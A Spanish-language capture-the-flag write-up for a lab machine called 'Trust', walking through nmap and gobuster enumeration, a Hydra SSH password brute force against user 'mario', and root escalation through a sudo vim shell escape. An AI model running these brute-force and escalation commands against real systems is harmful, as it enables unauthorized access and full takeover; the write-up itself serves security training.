# Trust

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.22.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FC4rfPipELDYrpUReQjeV%2F0.png?alt=media" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open -sT --min-rate 5000 -vvv -n -Pn 172.22.0.2 -oG allPorts
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FxXfVcCqqFl2TMqmx7AQI%2F1.png?alt=media)

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 172.22.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRMPcALU07ES2cpkbeMPP%2F2.png?alt=media" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagaremos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea un formulario de iniciar sesión.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPon2MUfjvAmqnyZPoSTR%2F3.png?alt=media)

Ahora, buscamos directorios con la herramienta **Gobuster** a través del comando:

```bash
gobuster dir -u http://172.22.0.2/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20 -x html,php,txt,js
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FWC0mcFigqjYwkLsj7jzP%2F4.png?alt=media" alt=""><figcaption></figcaption></figure>

Vemos que hay dos directorios con estado **200**, lo que significa que la solicitud realizada por el cliente fue exitosa. Procederemos a investigar más sobre estos directorios.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fn4gkKHvfEi5aUpgqoYUG%2F5.png?alt=media" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Con la información obtenida anteriormente, realizamos el comando:

```bash
hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.22.0.2 -t 5
```

Este comando utiliza la herramienta **Hydra** para realizar un ataque de fuerza bruta contra el servicio SSH de una máquina con la IP **172.22.0.2**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FrxgHQKp9vsSg78XnMRny%2F6.png?alt=media" alt=""><figcaption></figcaption></figure>

Al realizar el ataque de fuerza bruta, descubrimos la contraseña de **mario**. Sabiendo esto, nos conectamos a través de SSH al usuario con el comando:

```bash
ssh mario@172.22.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJs6bmSmjEBKrsZTVnzh2%2F7.png?alt=media" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que ejecutamos:

```bash
sudo -l
```

para ver si hay algo que podamos explotar.

![](https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FYXt9u8pQEd8h9MCPd8FE%2F8.png?alt=media)

Observamos que podemos escalar privilegios con **vim** utilizando el comando:

```bash
sudo vim -c ':!/bin/sh'
```

Tras eso, ejecutamos:

```bash
whoami
```

y confirmamos que ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F0RqmVWpBCf0Onrjo99Yg%2Fimage.png?alt=media&#x26;token=6b1b5bb3-ce74-4f91-b899-ccbdf6c41ea5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FYljTo0i8LmzqlVmfz4w4%2Fimage.png?alt=media&#x26;token=73456f3b-df7a-4561-85c4-ea81bf641594" alt=""><figcaption></figcaption></figure>
